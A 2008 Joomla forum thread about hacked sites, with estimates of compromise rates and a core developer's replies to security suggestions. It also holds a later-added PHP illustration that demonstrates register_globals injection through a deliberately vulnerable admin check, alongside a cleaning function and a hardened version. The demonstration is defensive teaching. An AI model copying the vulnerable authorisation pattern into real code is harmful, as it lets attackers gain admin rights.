Post by mbrown » Wed Oct 08, 2008 9:13 pm

well said!

RussW
Joomla! Exemplar
Posts: 9347
Joined: Sun Oct 22, 2006 4:42 am
Location: Sunshine Coast, Queensland, Australia

Re: Hacked AGAIN, reallly its getting retarded

Post by RussW » Wed Oct 08, 2008 10:00 pm

OK, let's see if some "clarity" can be found here, whilst also answering the initial query:
"IF the security checklist is applied to a CURRENT VERSION install, are there still security issues?? Is the site still vulnerable to these hacks? Or is using the checklist on a current version install enough??"
  • Yes, the Security Checklist will assist greatly in securing your site.
  • Yes, upgrading to the latest release will assist greatly in securing your site
  • Yes, vulnerabilities are still likely to be found in the future
  • No, any checklist is not enough to guarantee the result you are looking for
Not quite the answer I am sure you or others are looking for, but it's not spin-doctored or masking anything. Ultimately, there are too many factors external to Joomla! to ensure 100% success, including the ever-present threat of currently unknown vulnerabilities or undiscovered flaws in OSs/PHP/MySQL/web servers/networking/Joomla!/extensions/templates.

Anyone? I'm concerned enough that I have pulled my own Joomla site down until I know for sure, because my hosting company is intolerant of hacked sites or sites with multiple "holes" that could allow successful hacking.
Do you drive a car, ride a bike or walk the streets? Have you stopped doing any of these things because there was an accident yesterday? I hardly think so.

If you or your host, more importantly, have chosen to be that short-sighted then maybe it is time that another career was selected; sorry to be rude, but your host's comments show a serious lack of understanding of the environment they work within. Yes, Joomla! has been and will continue to be compromised, as will any application (commercial or Open Source). No, you will never be sure that you won't fall foul of the next exploit; if it was a sure bet, everyone would be doing it and the world would be a very bland place. That's why we all have different jobs, hobbies and interests: because we are all different and not all equal in skill and ability in all areas.

Let's try and take some perspective here.

Looking through the forum, I note that on average over the last month, there have been, let's say, 10 "I've been hacked" reports a day.

So let's do some simple maths: 10 x 30 days (assuming 30 days a month), that's 300 (assuming unique) sites a month compromised.

Let's now assume that the reported exploits are only 25% of the actual activity, so that makes 1200 sites a month.

OMG....!!!! If I also assume that these are all on unique servers, that's 1200 potentially insecure servers or poorly configured servers or, heaven forbid, that's 1200 hosts that shouldn't be in the hosting business..!!!! Now, that is a scary thought..!!

Now let's look at the installations, again looking through the installation forum and making similar assumptions. I see about 100 posts a day for new install queries, so 100 x 30 gives me 3000 new sites a month, and again applying the 25% rule, totaling 12,000 sites a month.

So, the "I've been hacked" sites are only 10% of all new installations, and this doesn't take into account all those existing installations which are not compromised.

In my eyes, that's a pretty impressive track record considering the capabilities of the application, and the skill sets of much of the community being non-IT-based folks.

Now, let's dig a little deeper still. Out of the "I've been hacked" sites (which, to be truthful, is not "hacked", it's exploited, defaced or compromised; if you had actually been "hacked" then you would be in the forums asking for help, and most likely your complete server would be compromised with no chance of recovery without a rebuild), let's assume that 30% of these have been due to incorrect permissions configuration, another 30% are due to poor server/PHP configurations and 15% were due to outdated or insecure Joomla! or extensions. That still only then leaves 25% of the posts actually being possibly due to code flaws, which in the above maths equates to 300 sites actually successfully compromised through a code issue or oversight. Hmmmm, again let's go to the maths:
  • 300 compromised sites
  • 12,000 new installations
That's 2.5% of new installations compromised, not to mention the current non-compromised install base out there. Compared to publicised commercial application exploits, it's minimal, and Open Source projects do not control the installation environment, unlike many/some commercial vendors do, ensuring a more stable installation environment.

This is not to say that more cannot be done or isn't being done, but site owners, developers, designers and administrators need to accept that their sites are ultimately their responsibility, and they have the choice whether to use a particular application or not, use a particular host or not, and how much effort they put into learning the environment they have chosen to work or play within.

With the greatest respect for many of the posters in this thread, it is always good to hear from Ron (good to see you again, btw), FW and Andrew, and always a worthwhile learning experience for me. I do think that there are valid points on both sides of the discussion, but I do also think that there are a few barriers to implementation of some of Ron's thoughts and that there is still further to go with respect to the security and functionality mix within many Open Source projects, not discounting Joomla! The JSST is a great step forward; Feedburner Security updates I believe are long overdue, but are here now, and I am absolutely positive that security is never far from the minds of many, if not all, of the core team members, especially Andrew and Anthony, who I am aware are very active in this area and have employed the help of several other well-respected experts to further develop this area.
Joomla! on the fabulous Sunshine Coast...
hotmango, web & print http://www.hotmango.me/
The Styleguyz https://www.thestyleguyz.com/

brad
Joomla! Master
Posts: 13272
Joined: Fri Aug 12, 2005 12:38 am
Location: Australia

Re: Hacked AGAIN, reallly its getting retarded

Post by brad » Wed Oct 08, 2008 10:03 pm

RussW wrote: Feedburner Security updates I believe are long overdue
Let me just post the link so no one misses it: http://feeds.joomla.org/JoomlaSecurityNews

masterchief
Joomla! Hero
Posts: 2247
Joined: Fri Aug 12, 2005 2:45 am
Location: Brisbane, Australia

Re: Hacked AGAIN, reallly its getting retarded

Post by masterchief » Wed Oct 08, 2008 11:33 pm

Wow, things have got lively :)

@rliskey - thanks for your comments. I agree with some and disagree with others.

While you find this a criticism of the project, the ease of use is actually one thing that sets it apart from others, and hence contributes to why people use it. People like "easy to use". People like convenience, even though most packaging these days displays warnings and such that few read. If people read warning labels then there would be no tobacco industry. There is actually a lot of information out there - but probably not presented in the best way. However, people will still choose to ignore it despite our best endeavours. Some people just don't care.

Ironically, most of your points are easy to solve, or are being planned, or are already implemented, so I'm still left wondering if there is a deeper root issue here. Anyway.
1. Rename the warning notice on the extensions site from "Disclaimer" which sounds legalistic and boring to "WARNING",
Not a bad suggestion; I'll pass it on to the JED people.
2. Add critical security information with links to the sample content included with every new install.
Brilliant! Would you be willing to prepare the patch to the sample content?
3. Effectively double the security of the initial Super Administrator account by requiring the user to enter an admin name.
We are refactoring the installation for 1.6 right now. I'll put that feature on the list. If someone wants to do a patch for 1.5 I'm sure the bug squad would seriously consider it for inclusion in 1.5.8.
4. Strongly consider making the installation just hard enough to require at least some minimal level of server knowledge.
Here's where I disagree. I think it's complex and daunting enough for the uninitiated.
5. Ban all the parasites from the extensions directory who are illegally selling encrypted extensions on top of this GNU/GPL project.
GPL compliance is an ongoing work but really, while a valid point, it's part of a very different discussion.
6. Make it easier to move critical files and directories outside of public_html.
This work is ongoing.
7. Add a more powerful logging system to the core.
More powerful than what? JLog is already there and we have plugins that can fire on various triggers. Maybe your point is to add more triggers in "X, Y, Z" locations to be able to log those things?
8. Develop an extension update system along the lines of Drupal's Update module
That's a good goal. 1.6 will lay some more foundation work that will one day allow that to be a reality.
9. Refactor the file and directory structure to completely separate Joomla core code from contributed extensions
I'm actually not a big fan of that. You have to have a certain level of knowledge to detect suspicious changes regardless of the file tree. I see your point but I don't think the effort delivers a significant gain because people still have to know what they are looking at and looking for.
10. Adapt Gallery2's security documents which very thoroughly cover many of the same issues Joomla faces.
I'm all for cheating, but going back to my earlier points - some people don't care about the fine print and don't want to read the manual.
11. Develop a clear security reporting process to better track trends and to reduce noise in the forums. Here's an example from the Drupal project:
JSST
12. Add many more sanity checks to the installer script, such as the 'register_globals' check.
Huh? We deliberately (with extreme prejudice) made 1.5 immune to the server register_globals setting. Did you not know that? See JRequest::clean (I think that's the one). We can't rely on the server settings, so we nuke all the globals very early on in the core execution.
13. Consider adding some of the best security extensions to the core package
But what you've done is point out that one (or more) is/are available at present. Do all people know about them? No. I also think admin based security panels have a limited boundary of effectiveness. Case in point is the one that checks whether things are up to date or not. You have to log in to find out that your Joomla site is out of date - oh wait, I can't log in because it's just been hacked. A much better approach is for a service to exist that pings a site, upgrades it while you are sleeping and sends you an SMS when done.
14. Make the JED Site Security section easier to find
As you will have seen, all the joomla.org family of sites are being reworked. I'm sure this can be taken into account when it's the JED's turn.
15. Respect the intelligence of the users.
And respect their stupidity and laziness. There is no black and white answer here, just differences of opinion.

A final comment on ease of use. One of the unwritten goals of the project for many years was to put the web within the reach of people who don't know much about the web. Joomla is built on stories of wives being able to keep friends and family apprised of a seriously injured husband, of local communities rallying together to knock up a web site quickly and easily to raise money for life-saving surgery, and of remote third-world areas being able to set up and run their own website without a lot of prior learning. The "deliberately" complex systems, like Typo3, can't do that. T3 and others of its ilk are deliberately pitched at a level of expertise. So is Joomla; it's just a lot lower. Does that cause issues? Heck yeah. Support increases (because you have to deal with people who are not tech-savvy), but whether it's T3 or Drupal or Joomla, the attention to detail on security issues has to be the same. None of them are perfect (in fact, if you ever find a piece of software that guarantees it is 'bullet proof', run away, run away very fast; they probably don't know what they are doing).

I'll be the first to agree that on the post-implementation side of things, we could do a better job. However, to suggest we are deliberately doing nothing because we want to keep it that way is really unwarranted. We can do better - most certainly (<insert std call for volunteers to make it happen - bla bla bla>) - but if you look over this year you'll see many, many changes, I believe, in the right direction.

Anyway, once again, thanks for your comments. There is some food for thought there and some things we can act on (or already have in the pipeline). On the areas where we disagree, well, frankly, the wonderful thing is we have many systems to choose from and the right one for you, is the right one for you. Some choose T3, others Drupal, and on the odd occasion someone comes across Joomla. I know those other projects have dedicated teams supporting those projects and also wrestling with the same problems that we do. But when you do find the project that fits like a glove, by heck put your heart and soul into supporting it. That's all any of them would ask.

And absolute last:
brad wrote:Let me just post the link so no one misses it: http://feeds.joomla.org/JoomlaSecurityNews
^^ what Brad said. Get onto the security RSS feed - it could save your site.
Andrew Eddie - Tweet @AndrewEddie
<><
http://eddify.me
http://www.kiva.org/team/joomla - Got Joomla for free? Pay it forward and help fight poverty.
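What Andrew's reply to point 12 describes ("we nuke all the globals very early on") is worth seeing in code, because the attack it stops is easy to miss. With register_globals=On (PHP 4 and PHP 5 before 5.4), every request parameter was copied into the global scope, so a request carrying ?is_admin=1 silently created $is_admin = '1', and any script that read an uninitialised global was attacker-controlled. The script below is an added illustration written for this thread; it is not Joomla's JRequest::clean() and the function and variable names (neutralise_register_globals, is_admin_vulnerable, is_admin_hardened, the 'role' session key) are assumptions of the example, not Joomla identifiers. The request data is constructed inline to simulate what register_globals would have done, so it runs on any PHP version, including those where the setting no longer exists.

```php
<?php
// Added illustration for this thread, not Joomla's own JRequest::clean().
// Simulates register_globals=On by hand and shows (a) the vulnerable
// pattern it enabled, (b) the "nuke the globals" defence, (c) the
// hardened way to write the check so the setting is irrelevant.

/**
 * Unset every global whose name matches a key in any request array,
 * leaving the superglobals and CLI argument variables alone.
 * Returns the names that were removed, so a caller can log them.
 */
function neutralise_register_globals(array $sources): array
{
    $protected = [
        'GLOBALS', '_SERVER', '_GET', '_POST', '_COOKIE',
        '_FILES', '_ENV', '_REQUEST', '_SESSION', 'argv', 'argc',
    ];
    $removed = [];
    foreach ($sources as $source) {
        foreach (array_keys($source) as $name) {
            if (in_array($name, $protected, true)) {
                continue;                    // never touch a superglobal
            }
            if (array_key_exists($name, $GLOBALS)) {
                unset($GLOBALS[$name]);      // allowed on PHP 8.1+ as well
                $removed[] = $name;
            }
        }
    }
    return array_values(array_unique($removed));
}

/**
 * Vulnerable pattern (assumed example code): an authorisation flag that the
 * script never initialises, so whatever register_globals injected is used.
 */
function is_admin_vulnerable(): bool
{
    global $is_admin;                        // reads $GLOBALS['is_admin']
    return !empty($is_admin);
}

/**
 * Hardened pattern: initialise every variable and read the trust decision
 * only from server-side state you control (here a hypothetical session array).
 */
function is_admin_hardened(array $session): bool
{
    $is_admin = false;
    if (isset($session['role']) && $session['role'] === 'super-admin') {
        $is_admin = true;
    }
    return $is_admin;
}

// --- Constructed demonstration ------------------------------------------
// What register_globals=On would have done with GET /index.php?is_admin=1
$_GET = ['is_admin' => '1', 'option' => 'com_content'];
$GLOBALS['is_admin'] = $_GET['is_admin'];

$before  = is_admin_vulnerable();                                   // injected flag honoured
$removed = neutralise_register_globals([$_GET, $_POST, $_COOKIE]);  // the "nuke" step
$after   = is_admin_vulnerable();                                   // flag gone

printf("before clean: %s\n", var_export($before, true));
printf("removed globals: %s\n", implode(', ', $removed));
printf("after clean: %s\n", var_export($after, true));
printf("hardened check for an editor: %s\n",
    var_export(is_admin_hardened(['role' => 'editor']), true));
```

Run it with `php register_globals_demo.php`. The point to take from it: the cleaning step only helps code that still leans on uninitialised globals, and Joomla's core doing it early protects the core and any extension loaded afterwards; an extension that reads $GLOBALS before the clean runs, or that re-imports request data into the global scope itself (for example with extract($_REQUEST)), has re-created the hole on a server where the setting no longer matters. The hardened function is the version a practitioner should write regardless of what the server's php.ini says.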

mbrown
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 198
Joined: Sat Jun 14, 2008 4:44 pm

Re: Hacked AGAIN, reallly its getting retarded

Post by mbrown » Thu Oct 09, 2008 1:30 am

Your point on 13 I really like there, masterchief!

